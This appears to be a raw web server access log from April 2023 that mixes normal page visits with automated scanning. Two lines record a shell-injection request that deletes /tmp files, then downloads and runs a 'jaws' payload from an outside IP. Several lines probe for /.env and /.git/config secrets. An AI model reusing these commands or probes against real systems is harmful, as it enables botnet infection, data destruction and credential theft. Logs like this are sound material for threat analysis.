182.50.132.104 - - [05/Apr/2023:02:50:04 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"
182.50.132.104 - - [05/Apr/2023:02:51:06 +0000] "GET / HTTP/1.1" 200 8380 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"
193.32.162.159 - - [05/Apr/2023:03:09:57 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
134.122.135.178 - - [05/Apr/2023:03:16:44 +0000] "GET /dongman/haizeiwang/ HTTP/1.1" 301 249 "/dongman/haizeiwang/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.154.128.189 - - [05/Apr/2023:03:44:35 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
200.186.148.27 - - [05/Apr/2023:03:51:03 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
198.235.24.146 - - [05/Apr/2023:03:56:01 +0000] "GET / HTTP/1.0" 200 41463 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
51.120.8.105 - - [05/Apr/2023:04:07:38 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:04:09:13 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:04:09:17 +0000] "POST / HTTP/1.1" 405 409696 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
124.56.129.137 - - [05/Apr/2023:04:10:25 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
109.237.97.180 - - [05/Apr/2023:04:28:55 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.97.180 - - [05/Apr/2023:04:28:55 +0000] "\x16\x03\x01\x01H\x01" 400 226 "-" "-"
109.237.97.180 - - [05/Apr/2023:04:28:55 +0000] "POST /.env HTTP/1.1" 405 411981 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.56.29.189 - - [05/Apr/2023:04:39:54 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.56.29.189 - - [05/Apr/2023:04:39:55 +0000] "POST / HTTP/1.1" 405 409704 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.56.29.189 - - [05/Apr/2023:04:39:58 +0000] "POST / HTTP/1.1" 405 409696 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.62.197.196 - - [05/Apr/2023:04:44:36 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36"
64.62.197.194 - - [05/Apr/2023:04:45:53 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
64.62.197.188 - - [05/Apr/2023:04:46:20 +0000] "GET /geoserver/web/ HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36"
172.104.11.4 - - [05/Apr/2023:04:56:30 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [05/Apr/2023:05:03:14 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
179.43.177.242 - - [05/Apr/2023:05:04:03 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
